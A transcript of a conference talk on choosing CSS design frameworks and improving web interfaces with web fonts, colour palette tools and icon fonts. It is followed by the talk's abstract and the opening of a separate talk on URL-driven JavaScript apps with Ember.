Are you learning about good CSS, or are you just learning the framework? And finally, extensibility is I have created this page with this design framework, and I'm handing it off to a designer. How likely is it that that designer will want to come kill me later? That's a good indication of how extensible that is. And there's a couple of different sides of that particular coin that we'll talk about, too. So there are four categories that we'll be discussing today of these design frameworks. And in no particular order, except for the order that I'll be presenting them in, there's the specific, the comprehensive, the selective, and then a special à la carte version that we'll talk about. So to begin with, let's look at specific design frameworks. Specific design frameworks are designed to provide solutions to the problems that 99% of your web apps are going to have. So things like, I need a grid system. I need to lay out things with a grid. I need that almost all the time. I need the ability to lay out different form elements all the time. I need my headers to be consistent sizes regardless of their hierarchy. Almost all the time. These are not going to be specialized at all. They're going to provide global options that will probably be applicable to almost all of the applications that you try to build on the web. And what that also means is that more than likely you will have to then come back around and fill in with your own conventions. So these do take a little bit of additional upfront knowledge of CSS to make a lot of these work. These are, however, very good for rapid prototyping because we don't want these prototypes to be very high fidelity. We don't want perfect typography and excellently chosen colors. We want things to be a little bit rough. Wireframes want to be ugly is a quote that I heard recently. And I completely agree with it. You don't want anything really pretty on it. So there's no reason to go beyond these very basic types of design frameworks. They also, believe it or not, work very well for long lived apps, apps that are going to be out there in the market for more than a year. Your definition of long lived may vary, but a long enough time. And the reason is they won't stand alone that way. Of course, you actually need the additional CSS to make these work for your specific circumstances. But they tend to be so lightweight that it's just not an issue to have them in your app. And in fact, the one that we're going to look at next is, I think, probably accidentally included longer than it needs to be because it's so lightweight, nobody bothers actually going through and removing it later. A point to note about rapid prototyping, though, is I would use these when I know that the code that I'm writing for this prototype will be used in production. It's a separate one that I normally use when I know it's completely throw away. But if I'm relatively certain that this prototype that I'm building or the team is building is going to be used in production, then I'll use one of these. Have you heard of Skeleton? Anybody? Just a couple? Okay. I'll actually, I have a web browser up with all of these guys. So let me bring that over. I'll go away. Okay. And nope, that's the wrong one. Just a moment. Sorry about that. Here we go. All right. So this is Skeleton. Skeleton is, I won't read it to you, but it's that thing. It is one of those very specific types of design frameworks. It provides a few things, provides a nice grid, and I can resize my browser. Let me get rid of this one. 
All right. I can resize my browser and you can see the grid is going to change size. So it has that responsive component to it. So that's nice. That's there. It has some basic typography to it. So these are the actual styles that your headings will have next to it. It has some basic buttons, some forms with input boxes, drop downs, radio buttons, check boxes. Discusses some of the media queries that make the form stuff happen, but that's actually it. Like this is it. This is your, this is skeleton right here. There's not very much to it. It really is lightweight. And that's nice for a few reasons. Okay. But first, unfortunately, skeleton really fails on the utility front. You can't build a production app with just skeleton. There's no behavior there. There's no actual visual style there. I guess technically you could, but it would be very, very boring and nobody would want to use it because everything is just gray and bland. So you can't just jump right into a production app while working with skeleton. However, it's very, very, very easy to get started. The reason is skeleton styles base tags. So it's going to style all of your H1s with a style. You don't have to add CSS classes. You don't have to tell it specifically, I want to use skeleton for this. It's going to hijack most of your user agent styles that have defaults for headers and so forth and style those. As a result of it not really covering every circumstance that you'll need and you need to add some additional stuff on top of it, there is some education opportunities there. So you're going to have to learn some CSS by looking at the skeleton code. You'll actually learn quite a bit of CSS as well. It's relatively clean, well organized, easy to understand and well documented as well. And then it's sort of designed to be extensible. It's the whole point of its existence. I don't think the creator had any intentions that skeleton would be used for final user interfaces. The whole idea was release it, get it out there, let people build upon it to create their user interfaces. This type of category is often very light on the options. So you're not going to have a ton of different variations on this theme. Some might do some additional styling for drop down lists. Others might add some table layout type stuff. Not table layouts, table styling. Don't do table layouts. I could have missed that earlier. But they're all mostly relatively lightweight. Not going to do anything crazy for you. On the other end of the spectrum however are the comprehensive ones. They're very, very behemothal. I mean they're huge, gargantuan. Do everything for you. No seriously, they do absolutely everything for you. The whole goal of these particular frameworks is to do everything for you. You don't need a designer. You don't need anything else. You just need to use this one framework and everything will be fine and happy, rainbows and unicorns and all that other good stuff. These are good for rapid prototyping only if you never, ever, ever plan to release your code into production. The reason is this paints you into a corner where it's very difficult for you to extend on top of it. This is the framework type category that I normally recommend for building those personal tools just for yourselves. Because you probably don't need to go through a lot of extra effort to make a pleasing visual design for yourself if you're the only user. If you're going to release it to other people maybe look at revaluating and using one of the others. 
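As a quick aside before moving on to the comprehensive category: the Skeleton demo above really does boil down to a handful of class names on top of bare tags. The snippet below is an illustrative sketch using Skeleton's original 16-column grid classes; the page content is invented.

    <!-- Skeleton styles the bare heading and paragraph tags for you;
         the grid is just class names whose columns add up to 16 -->
    <div class="container">
      <div class="eleven columns">
        <h1>Page title</h1>
        <p>Main content goes here.</p>
      </div>
      <div class="five columns">
        <h3>Sidebar</h3>
      </div>
    </div>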
But if it's just a tool for yourself, go right ahead with one of these comprehensive ones. Would anyone like to take a guess as to what framework type I might be referring to here? That's absolutely right, Twitter Bootstrap. I don't mean to rag on it specifically. It is a perfectly valid category. It's why I included it here. But it's very important to be aware of its strengths and limitations. And unfortunately it does have quite a few limitations. It does everything for you. I can't stress that enough. It includes JavaScript plugins for auto-completion and throwing up light boxes, some of those 50 plus light box plugins. I don't think you need those if you use Bootstrap. There are some themes for it that you can download. There are also people that seem to be professional theme makers for Bootstrap which might be kind of a red flag anyway. They're not very efficient. You can get started with it fairly quickly but if you want to build a complete site with it you have to read through a lot of documentation to figure out all the different ways that you can use the different components of it. So it scores relatively low in efficiency. You certainly learn a lot with it but you don't learn CSS. You learn Bootstrap with it. And so I can't give it any high marks for education because you end up not really learning very much about CSS because it does so much. There's so many lines of CSS it's impossible to tell exactly what's going on where. So not very good for learning things. And again it's not very extensible unless you're one of those professional designers of the Bootstrap themes. If anyone here is that, great. I hope there's money in it. It certainly seems like there is. Just like the WordPress theme thing. But I've had the unfortunate job of trying to extend Twitter Bootstrap on two or three occasions and ultimately just recommended they get rid of the whole thing. The third major category is selective. It's kind of in the middle of both of those. It's sort of a good middle of the road option. It's not too opinionated one way or the other. Most importantly they're deliberately incomplete. So Skeleton was also deliberately incomplete but it was so deliberately incomplete that you almost have to do too much work to get it to apply. These types of things are, like I said, kind of in the middle. They provide a lot for you. They don't provide everything for you. You will still have to learn some CSS. You'll still have to extend them. But they're great for a lot of circumstances. In fact, we most of the time start with one of the members of this particular category. That's going to be changing but we'll talk about that in the à la carte section. One of the better known examples of this is ZURB Foundation. And I actually have to call myself on a lie a little bit on this slide because the recent versions have definitely shifted it more in the comprehensive category. They're trying to compete a little bit more with Twitter Bootstrap. But the reason it's still valid is you can download the earlier versions which are absolutely right in the middle. They didn't provide a lot of the additional styling and icons and so many other things that Twitter Bootstrap provides but it certainly was a lot more than something like Skeleton. Definitely right in the middle. And the scores kind of show it. It's relatively useful. You can probably build a short lived application on it with very few issues. And not have to worry about a lot of additional styling after that. It's relatively easy to get started with. 
It includes some base styles based on bare tags so you don't have to apply a lot of CSS classes. There are some CSS classes there so you'll need to read through a few pages of documentation to become really familiar with it. You'll learn quite a bit about CSS. This one again is more toward the prior versions when things were a little bit more generically mentioned. Right now they have so many exceptions to the rules that it's very difficult to really understand the complete picture of one particular group of CSS rules. That's relatively extensible. The new version which I believe is either four or five. I think four was the one I tried to extend most recently. It's kind of a pain but version three was still okay so if you're interested in swapping back to 3.0 these scores definitely apply. And then finally we have the a la carte version. And this is where I think a lot of design frameworks are going to end up moving toward. And the reason is this provides a lot of the benefits of all of the other versions. Predominantly because they're completely modular. And so you can pick and choose all of the individual components that you want to download and use in your application. And they're designed that way. There's no expectation that you will download absolutely everything. JQuery is also moving toward this version in the 2.0. You can download specific parts of JQuery. Maybe it's getting a little bit heavy in the file size and so this allows you to pick and choose exactly what you're looking at. There's a new framework that was released just a couple of weeks ago I believe called Pure CSS. I'd like to bring that up on the screen for you guys in a moment. But it solves that problem. It's definitely modular. There's a lot of different parts to it. You can download just the ones that you might be interested in and leave the rest alone. So let me bring up my web browser. The right one. There we go. And here is Pure. So very pretty web page. Definitely going on the flat design trend that they've got here. But you can see from the very beginning they're serious about this. They have all of their different groups categorized and sized up for you. So you can say, I just want tables. And here's how you style your tables. You can see this is one of the examples that most of this stuff is bare tag so you don't need to apply a lot of CSS styles to it. You style the entire table with one of their attributes. But you can download the whole thing for what is that, 0.6 kilobytes. Not very much. So if all you're doing is just working with tables, just download that one a little bit. Or if you care too, you can download the entire thing and use all of it in your application as well. But I think we're going to see a lot of frameworks end up hitting this particular sweet spot. Because think about it. Bootstrap has all these components. If they're able to separate those out and say, you know, all I care about is the buttons. All I care about is the navigation. Let me just download this one small part. It's a heck of a lot lighter weight. Probably still just as difficult to extend. So I don't think it's going to solve all of the problems. But it will at least preclude you from having to use Bootstrap everywhere in your site. And for those of you that have used Bootstrap before, sorry, but you can kind of tell a Bootstrap site from a very long distance. Even the ones that have skins on them, you can sort of just glance at them and say, oh, that's a Bootstrap site. 
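As an aside, the Pure table demo above really is about this small. The pure-table class is the documented starting point in Pure's tables module; everything inside it is ordinary table markup, and the rows here are made up.

    <!-- pull in only the module you need, e.g. Pure's tables CSS, then: -->
    <table class="pure-table">
      <thead>
        <tr><th>Framework</th><th>Category</th></tr>
      </thead>
      <tbody>
        <tr><td>Skeleton</td><td>Specific</td></tr>
        <tr><td>Pure</td><td>A la carte</td></tr>
      </tbody>
    </table>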
There actually is one such instantly recognisable Bootstrap site that I'll show after the talk if anyone's interested. But someone attempted to recreate early 1990s GeoCities with a Bootstrap theme. So it had the little construction animated GIF or GIF guy. Rainbows all over the place, sparkling backgrounds. It's quite a thing to see. For the sake of everyone's eyes in the audience, I won't bring it up right now on this huge thing. But if someone wants to see it on my smaller screen, I'd be happy to show that to you guys. All right. So these à la carte frameworks have a lot going for them. They can do everything for you. Because they're à la carte, you can mix and match. Most of the ones that I've looked at do a fairly decent job of not clobbering everybody else's design framework prefixes and stuff, predominantly because they use these prefixes. So Pure uses a pure prefix. Others will use a little CSS prefix of their own. And so you don't get a lot of the bare styles conflicting with each other. So if somebody prefers Helvetica and somebody else prefers Georgia, they're sort of clashing. They also, again, can be very efficient to get started with. You saw that Pure just required one or two CSS classes and then our table was just fine after that because it used the rest of the bare tags within that. Education really does vary. It just depends. Some of these modular frameworks do a really good job of not having to make you touch any CSS whatsoever. Others do very little for you and you have to learn about the box model and border sizing and all these other interesting concepts. By and large, it seems fairly nice, but it's enough of a variation that I hesitate to actually put a score on it. And then, of course, these things are, again, designed for extensibility. So you just include the tables module for your 0.6 kilobytes and then you can design everything else however you'd like to and not have to worry about those specific tables. So all of this kind of fits neatly on a little spectrum diagram, if you will, that all comes down to how important is your user interface? So is it unnecessary? It's not to say that it's a headless application. It's just to say that, again, if you're building a site for yourself and you're the only user, you don't need a really fantastic user interface. If you're building a site for millions of customers, it probably helps to have a pretty decent UI. So you can kind of lay the different categories out like this. If you need something that's very, very extensible that you can customize to really fit your needs, go with one of the specific options. On the other hand, just building something for yourself, give one of the comprehensive ones a try. If you need something in the middle, go right ahead. And what I've found is this actually lines up fairly well to the types of users that you have. If these users tend to be internal users, excuse me, meaning yourself or someone else, a small group of people within your organization, some of these comprehensive frameworks actually end up working very well. On the other hand, if you're doing a lot of public-facing stuff or business-to-consumer type of work, you really need a lot more of a UI that's very differentiated from anything else that's out there. So something like Bootstrap wouldn't work. Probably go with something like Skeleton and then have someone, potentially yourself, actually go in there and make a really nice UI that's very customized to your specific needs. 
Most of Head Springs work actually falls in this middle section here in the business-to-business type of realm. And so that's why we end up using some of these more selective frameworks that's neither end of the particular spectrum. And it works out well for our cases, but it all depends on the type of users that you guys will be working with. Any questions so far? All right, great. And they gave me an excuse to have some more water. So let's go beyond that. I've already talked about frameworks. Where do we go from there? So we've picked a framework, want to make it a little bit more extensible, assuming that the framework you picked didn't already do all of these things for you. So we're sort of operating under the assumption that you didn't pick Bootstrap at this point because if you did, there's not much else to do except try to learn it as best you can. But if you did pick one that needs a little bit more extensibility, let's talk about some of the ways that you can actually make that happen. And the first is with web fonts. This used to be our group of fonts right here. There were a few others. If you were a Mac user, you had Helvetica instead of Arial. There's Trebuchet, MS, which is the coolest name typeface ever. And then Comic Sans, which everybody hates. And really, I used it on the slide so I could tell people that I legitimately used Comic Sans on a slide, really just to make fun of it really. But this used to be almost all of our selection. We didn't have a ton of other options. So if you wanted your site to look different, unfortunately, most people chose Comic Sans at that point, which is also included in the Twitter Bootstrap theme for GeoCities. We don't have that potential problem anymore. Ironically, it's thanks to a lot of work from the Internet Explorer team. I see ironically, because they're not exactly known for being very web dev friendly, but IE actually developed one of the standards for transmitting typefaces across the Internet. So we now have the ability to put custom type on our web pages. Two of the sites that I recommend people use are Google Web Fonts, which I think is responsible for a lot of the upsurge in using these web fonts. And a Typekit. Google Web Fonts is free. You can use it on any sites anywhere. You serve fonts directly from Google or rather Google serves fonts to your app. And then just move on from there. Typekit is much the same, but it has a little bit of cost associated with it. If any of you are also sort of the designer group and have Adobe Creative Cloud subscription, Typekit is included with that. If you don't, it's a relatively affordable way to get all of Adobe's products that are normally ridiculously expensive for not a lot of money comparatively. And Typekit is included. So with that, I want to take a couple of moments and just sort of walk through some basic features of Typekit, which I think are pretty helpful for this. So that's the wrong one again. There we go. Okay. So, and this comes up. There we go. This is Typekit. You can see by default it's showing me a few typefaces already, but this is the part that's really interesting to me over here. This allows me to characterize and filter down all of the typefaces that they have available. And they have a lot, many, many thousands of these typefaces that are available. So I can specify the type of feeling I want for my site. I'm writing a literature site, so I'm going to want something with some serifs perhaps. 
Probably not blackletter, but let's go ahead and check out some of those as well. So there are all these different options here. I can choose instead, we're making a modern site. So I'll do some sans serif. Let's make the thickness about equal, which is very modern sort of geometric looking typeface. And we have some very interesting options here. Freight Sans is actually one of my favorite typefaces. So let's go with that one. I can click it here and see a lot of different examples of what it's going to look like on this particular web browser. Really cool things. I can come to this tab. Here we go. This tab. And actually see what these look like on different browsers and OSs. So I don't have Windows open, so I can see what it looks like on Windows 7. I can go to Opera or anything like that. If we want to check out Windows XP, we can. But that doesn't always look very good. It's kind of hard to see down here. It doesn't look very good up there either. But you have all these options that Typekit gives you while you're actually searching for some of these typefaces. And then when you're ready, you simply add it to what they call a kit. And then you reference that kit in your HTML. And there you go. You have a custom typeface in your application. There's some potential gotchas with these. Most notably that this is still an HTTP resource. It has to be requested from a server that's not your server. So additional point of failure potentially. I believe mobile Safari will not display any fallback fonts. So if you say give me Freight Sans Pro and then give me Helvetica if it doesn't find it, it won't display anything until it downloads the typeface. There's some ways to get around this, but some things to be aware of. But even if you do nothing to even something like a Bootstrap site, except swap out the typeface for something a little bit different, it's already going to look considerably better than if you use the regular Helvetica, the regular types of typefaces and so forth that it has included. If you're interested in finding what typefaces work well together, this is a site that I use quite often. There's the URL there. It just shows you a number of different examples of places that have two different types of typefaces. Very common. We'll have a certain typeface for headings. So if they stand out, normally it's very bold. Sometimes that's serif and then the actual content of your page is in sans serif. This site has a lot of that information definitely worth checking out. However, there's one thing to be aware of. There's a site called Font Squirrel, and I don't mean to pick on Font Squirrel specifically because there are a lot of other sites that do this. Ultimately, the behavior is you pick a TrueType font or some other type of font that you have on your computer. You upload it to Font Squirrel or some of these other sites, and they give you all of the web fonts you need. It seems great. You just toss those in your web server. You can serve up these fonts from your server. They will show up in your devices, and that was really easy. Unfortunately, almost every single one of the licenses on typefaces available today precludes you from being able to legally do that. You have to use a font that's specifically designed to be served on the web. Google Web Fonts does this. Make sure that they have the right typefaces. Typekit does this. Fonts.com has another subscription model where you can use the web fonts. 
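For reference, wiring up one of these hosted services is typically a one-line include plus a font stack with sensible fallbacks. The sketch below uses the Google Web Fonts include syntax with Open Sans as a stand-in family; Typekit works similarly but via a small JavaScript embed tied to your kit ID, so check the embed code the service actually gives you.

    <link rel="stylesheet"
          href="http://fonts.googleapis.com/css?family=Open+Sans:400,700">

    <style>
      /* keep fallbacks in the stack so text still renders if the font request fails */
      body { font-family: "Open Sans", Helvetica, Arial, sans-serif; }
    </style>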
All of those sites — Google Web Fonts, Typekit, Fonts.com — do this legitimately, but do be aware of the ones that say all you have to do is upload your font. And don't want any lawsuits impeding your ability to release software to your clients, trust me. Also it's just nice if you really enjoy a typeface. Some of the font foundries, the creators of some of those typefaces, will allow you to purchase licenses as well. Check that out. That also has the benefit of supporting these guys that actually are building these fonts. Colors are another interesting thing. I love taking an otherwise bland website and just adding a bunch of splashes of color on it just to see what happens. Let's talk about colors for a bit. They're generally used to convey information. In the last talk I discussed some ways of preventing people from doing erroneous things or potentially destructive operations. We looked at the fact that buttons that are red tend to do that very well. People sort of have a psychology when they see something red. They need to pause for a moment and say, this could really be a bad thing. Unless your company's colors are red and that might not be good either for a number of different reasons. Which brings me to the second point. If you are working on a public website for your company, they may already have colors. They may already have logos. But if they don't, in general, cooler colors tend to be a little more positively received. So blues and greens and that sort of thing. Warmer colors with reds and oranges and so forth are maybe a little bit more negative. A lot of this is cultural. You go to a different part of the world and these things are completely different. But by and large it's kind of how this sort of thing works. So again, if you've got company colors or something like that, go ahead and use those. If you don't, check out this site. I love it. It's awesome. I don't want to bring it up right now, but you can go to it on your mobile devices or what have you. People upload photographs and then they convert those photographs into color palettes. Amazingly balanced colors. They work really well. I especially enjoy just sort of sensing how I feel when I scroll through the site. So there will be a beach scene or something like that and it will have some very nice light cyans and some peaches and so forth. I mean, I feel very relaxed. So if the website I'm trying to build is meant to relax people, I might take a look at that particular color scheme. The other option is Adobe Kuler, which is an app that's been around for a while. It was recently re-released. It was a Flash app. It's now an HTML5 app. Kuler.adobe.com. I'll give people taking pictures a few seconds. All right. I have a quick demo that I wanted to show of Kuler. If I can ever go to the right side of my screen. So this is Kuler. It gives you a very large color wheel with which to start. You can actually look at other people's color schemes that they've already created by going to explore here. These aren't necessarily sorted by default. It's just sort of whatever happens to be shown here. So there's some that I probably wouldn't recommend. This one doesn't really come across to me as all that awesome. On the other hand, this seems like a really great group of colors right there. But of course, you can create your own. And you can do so by manipulating these little drag handles. Kuler uses some basic color theory techniques like certain colors at different positions on the wheel look well together. 
And so you can kind of drag things around and see how those manipulate. So we have kind of a nice pastel pattern right now that we've generated in sort of a rainbow scheme a little bit. Really, really great. Again, HTML5. One more thing that I wanted to show is actually this little notice right here. It's going to be impossible to see for you guys. But I'm going to do it anyway. And that is there's a Kuler app for the phone. And so you can just hold it up to a picture and it will detect the colors that are shown in that camera picture and give you a little color scheme here. You can upload this to your Kuler account and have it available. So if you just happen to be out and about, you guys have some amazing scenery here in Norway, just hold it up against a fjord or something, take a picture. It'll be synchronized to your Kuler account and then you can build a website based off of those colors. The app is free. So go out and grab it. And then this is a pretty awesome thing as well. So let's talk about icons next. I love icons and symbols of all kinds. I love them. They're such a concise way of communicating information, especially to people that have been using your software for a while. Road signs are an amazing example of this. Everybody knows what a road sign means because they've been exposed to it for quite a bit. So you can extend this to software and things that people are used to, like the floppy disk for a save icon, can become relatively ubiquitous and you don't have to explain when you click this button, the page is going to be persisted in some sort of data store. Maybe database, maybe the cloud, what have you. You don't need to explain that to people because they've been exposed to the floppy disk icon for so long. But icons have a couple of disadvantages right now on the web. For one, you have to design them typically. You have to serve them up from a website. Sometimes this means multiple requests. I have a high DPI screen. This is a retina MacBook Pro. So I can tell if people haven't created high resolution icons because they look kind of blurry. But there's a solution to this. It came from a kind of an unexpected place. Here's a particular character. Probably you'll recognize this character, use it fairly frequently. But what makes this recognizable? Well, the shapes, basically. It's sort of the letter form of an A with a circle over it if you want to get the sort of American dumbed down version. This is the same thing. I can recognize this. This isn't a character in my language, but I still recognize it as the same character as the last one. This is a different typeface. This is Book Antiqua. The last one was Helvetica. We can go a little bit crazier. Here's the much maligned Comic Sans again. Same thing. I can recognize this. Sure, no problem. But what makes this the letter that it is, is the context in which it's seen. There's, if you see this in a word or a sentence, you know that's what that means. You can pronounce it a particular way. Say the correct word in the correct version. But it's all about that context. Say we changed that context. So, for example, you just saw this on a slide with nothing else next to it. Maybe it was rotated nine degrees. Maybe it was pointed downward. Doesn't necessarily mean exactly the same thing. And so with this in mind, some people created some fonts that do the same thing. There's nothing particularly contextually appropriate about that icon. It could very well be that particular character. 
So in the typeface, instead of putting the letter A with a circle over it, let's put a light bulb. Why not? And you can use these just like you would in any other typeface. So we've already discussed the Typekit stuff. You can use these icons. In fact, all four of these, this is text. Believe it or not. It just so happens these four icons actually come from parts of the Unicode standard that aren't standard characters. So you're not going to replace the standard alphabet with them. But they exist in this typeface. And you can download it. And you can type with a keyboard if you know what codes to use. And these icons will appear for you. This is a concept called icon fonts. Does anyone here use icon fonts already? A few? Okay. If you're not, hopefully I will convince you that it's a really cool thing to use. I mentioned some of the detriments of regular icons. Some benefits of icon fonts specifically are that they're a single HTTP request. So you download an entire typeface that has potentially hundreds of icons in it. You can scale them because they're vectors, just like text is vectors. I can go into Keynote and make this text considerably larger. It's not going to look fuzzy because that's the virtue of it being a typeface. And as long as you're working within the same font family for this stuff, they're visually consistent. And we'll see what that looks like in just a moment. But before we do, I just want to have a slight word of caution. Use these judiciously. Don't overdo it. You can have too many icons on your page — so many that it's confusing for someone and they don't exactly know what to click when. And make sure that you choose them for their meaning, not their appearance. And I mean something like this. I love this icon. This is probably my favorite icon in the set. It's cute. It's got a lot of personality to it. It's a little sciency, kind of geeky. It's great. But if I were to use this in a web application, what would it mean? Unless I was building a chemistry app, it's anybody's guess what this could be. This icon, for example, it's kind of become somewhat ubiquitous as the settings icon. So you tap this, you're going to change some configuration options of whatever app you're working for, working with. So with that in mind, make sure that when you're choosing these icons, make sure that they're actually meaningful to your users and not just cute little beakers and stuff like that. So three of the icon collections that I found most useful are Font Awesome, which is designed to work with Twitter Bootstrap — but it works without it as well, no problem. Typicons, and then Linecons. Linecons is actually where the icons in this presentation came from. And all of those have some public repos or public URLs you can go to. However, there's some better ones. And we'll see what this means in just a moment. Fontello and IcoMoon are a couple of websites that I highly recommend you visit. And I will show you why right now because they actually contain a number of different fonts, icon fonts. It is really tough typing on this tiny little screen. Here we go. Okay. So IcoMoon is an online app that also includes a specific collection of icons called the IcoMoon set. These are free. Others are for pay, so you'll have to drop some money on those. Most of these are relatively affordable. It's not going to be anything crazy. 
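The mechanics behind these icon font tools are worth seeing once. A generated kit is essentially an @font-face rule plus one CSS class per glyph, each mapped to a private-use Unicode code point. The file names, class name and code point below are placeholders for whatever IcoMoon or Fontello actually generates for you.

    @font-face {
      font-family: 'icons';
      src: url('fonts/icons.woff') format('woff'),
           url('fonts/icons.ttf') format('truetype');
    }

    .icon-save:before {
      font-family: 'icons';
      content: '\e600'; /* private-use code point assigned by the generator */
    }

In markup that becomes something like <button><span class="icon-save"></span> Save</button>, and because the glyph is just text it scales and recolours with plain CSS.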
The idea behind the IcoMoon app is that just like Twitter Bootstrap has way more than you'll ever need, chances are these have way more than you'll need, too. And so if you want to, you can come in here and just pick a few of these icons, only the ones that you might need for your application, and then you can download them as a custom font file that will only include in this particular instance these six glyphs. This is significantly smaller than downloading the entire collection of icons for this font. Fontello does the same thing. I tend to prefer IcoMoon because it has a lot more sets that you can include. So here's Font Awesome. This one is, what is that one, Entypo? There's a lot more down here. You can just keep scrolling and see many of these and you can add them in. These two are the not free ones from IcoMoon. This one is the free one from IcoMoon. You just sort of add, you can look at that one, but add it to your collection if you wish. And once that's done, I now have the ability to scroll down and actually look at — so I did add Entypo — actually look at all the typefaces that are in Entypo. This is kind of where I said be careful about the types, the icons that you choose because if you choose them from two dramatically different sets, it's not going to be very obvious that they came from different sets, but things are going to just look a little bit off to your users. They won't be able to say, wait a minute, they used two different icon font sets, but they will say, maybe not even consciously, these look a little bit weird next to each other. Fortunately, a lot of these sets have a ton of icons. IcoMoon I think has another 200% on top of the ones that are already shown here if my math is right. So there's a number of these. You don't necessarily have to go all kinds of crazy places to find different icons. Definitely check these out. I really like this concept. It's worked out very well for us at Headspring. We use icon fonts in practically every single project that we have. So to kind of review what we've discussed today, we looked at a number of different frameworks and how they can fit different needs. We took a look at the comprehensive ones like Twitter Bootstrap that do practically everything for you. Very specific ones like Skeleton that only solve one or two individual problems and then rely on you to do the rest. And then selective ones somewhere in the middle so that you can kind of balance and pick and choose whichever ones you're looking at. We also talked about the a la carte ones which I personally think are still the future. We're going to start seeing a lot more of this modular download concept where you say, I just need to do forms. I don't have any tables in my app so I don't need those CSS styles. That's a waste for my particular application. And we also talked about how to augment these defaults with fonts from services like Typekit and Google Web Fonts, colors from Adobe Kuler and Design Seeds and COLOURlovers, which is the third one that I don't think I mentioned to you guys. It's a little bit more of a community-involved, crowdsourced type of list, but there's a lot of great selections there, and that is colour with a 'u', not without. And we also took a look at some icons and some icon fonts that you can use so you don't have to serve up a lot of different HTTP requests but still get this neat symbology concept in your web applications. So thank you very much for your time. It's been great talking to you guys today. 
If you have any questions, I think we have a few minutes left. Please.
|
You and your team have unit-tested, continuously-integrated, and overall maintainably-crafted a great Web application. To match the rock-solid foundation underneath, why not give your site the visual polish it deserves? In this talk, you'll be introduced to several UI-focused frameworks to help give your functional site a facelift. You'll also learn about some easy ways to spruce up your UI with Web fonts, icons, and colors. Come learn how to take your site from maintainable to magnificent...no design expertise required!
|
10.5446/51520 (DOI)
|
So, you test this on? All right, shall we get started? Is everyone ready? Well, thank you guys so much for making it. I'm glad that I could be one of the first to welcome you to NDC. But seriously, thank you guys for making that the last session. I know that three-day conferences can be especially grueling, so I really appreciate it. Today, I'm going to be talking to you about building URL-driven apps, specifically JavaScript, client-side web applications. My name's Tom. I work on a framework, a JavaScript framework called EmberJS, so that's kind of the lens that I'll be viewing this talk through today, so that's what we'll be talking about a little bit. This actually is my first time in Norway. I put out this tweet yesterday, which was apparently a little bit of a hot button, because it's actually got retweeted 132 times. It's like one of the most viral tweets I've ever seen. Okay, so apparently this is like a really controversial subject that hit a lot of people. But then someone replied to this, and they said, that's why college is free in Norway. Beer is expensive, college is free, so I'll take this as an invitation to send my kids to Norway for their college education. So thank you guys for subsidizing that. So there's a couple of things I want to talk to today. This is basically the outline for my talk. The first thing I want to talk about is just the state of web browsers today. Then I want to talk a little bit about URLs, which I think is really, if you have a takeaway from this talk, it's URLs and basically how they are the UI of the web and how so many people today are breaking that UI by not really thinking about this as they're trying to move more of their logic from the server to the client. And then I'll give you guys a demo of basically building a small application using Ember that thinks URLs first. And then lastly I'll strap up and talk a little bit about the future of the browser and where I think things are going and how Ember plays a role in that. So the first thing I just want to say is that browsers are getting more powerful all of the time, right? So if you think about the way the web browser started, it was basically this document viewer, you could annotate text, and of course the key thing was that you had these, it was hypertext, right? You had these URLs. So from one document you could link to many other different types of documents. But over time it's kind of evolved to be more of an application runtime than a document viewer. So this is a screenshot, this is the Chrome experiments website where they basically show these demos that really flex the power of these new features that are coming to the browser. Firefox has also got one, sorry, Mozilla has also got one. I think theirs is probably the best design. Again, this is basically them just showing off features like web workers and mobile APIs like you can access the camera, etc. And even Microsoft is getting in the game, right? Like, I know this is a very Microsoft sympathetic conference, but when I primarily speak to a lot of web developers who are like Rails developers, no developers, and there's a sense of Microsoft being kind of a monolith that doesn't really get it. But the more I talk to the IE team, the more I think, wow, these guys are really embracing the web. They've got, I think this is really neat, they've got a website where you can actually download plugins for IE that let you try out some of these features before they've landed everywhere. 
So the point here is that there's a lot, a lot of new features coming that are turning the browser from simply a document viewer that you can spice up with a little JavaScript into a really powerful application runtime. But when I go out and I talk to developers, a common refrain that I hear is like, yeah, you know, that's cool. There's always new features, WebGL, web workers, WebSockets, all these things sound cool in theory, but when are we going to get it, right? People have this intuitive sense of the standards process being very slow of browser adoption, being very slow, and you can't really rely on it, which is why I think a lot of people are attracted to native, right? Because basically every year you get a ton of great new features, you can do stuff that delights your users. But I think the most important thing is, do you guys know what an evergreen browser is? Has anyone heard this term of an evergreen browser? So the idea of an evergreen browser is simply one that updates itself without prompting the user. Basically every time you open it checks to see if there's a new version, and if there is a new version it basically installs itself. It doesn't go about prompting you. I don't know if your parents are like my parents, but the second they see an update they're like, no way, are you kidding me? Like this thing has been working fine for years. I do not need your new crappy browser. Just leave me alone. So the fact that it's not something that you have to prompt, it's something that just happens. And I think Chrome is the prime example of this, right? So think about if you're developing a feature, you don't really worry about like, oh, does that version of Chrome support that feature? You don't even really think about it, right? You basically fire up Chrome on your computer, you test it out, and if it works you're like, cool, we can use it, right? Because for most people you can assume that every user has an updated version of Chrome. Now, I think Chrome really pushed the envelope here, but the next generation of browsers are all evergreen. And that means IE 10, Firefox, Chrome, the only thing really left is Safari, which fortunately does not have the biggest market share anymore except the mobile devices. So that's definitely still something to be worried about. But the thing to keep in mind here is that not just that progress is being made, but the progress of progress is increasing, right? It's like the second order increase. So this is a quote from a book that I really liked by Ray Kurzweil called The Singularity is Near. And the idea here is that human progress is kind of increasing at a similar pace. So our intuition, our gut feeling about the pace of change has to do with linear improvement. But in fact, as things start updating themselves, you actually see this exponential increase. And I think that's going to start happening to the web platform to the point where it's actually possibly even going to be innovating at a faster pace than native. And I think that's really, really exciting. So don't think, you know, these new features are never going to arrive. It's time to start thinking about this stuff now because it's going to be here a lot sooner than you think. Evergreen browsers are a total game changer. And I just want to show you a quick example of this. My friends at Mozilla have been working on this project called AsmJS, which is basically a way of getting near native performance in the browser. So I just want to say, you know, this is not a souped up. 
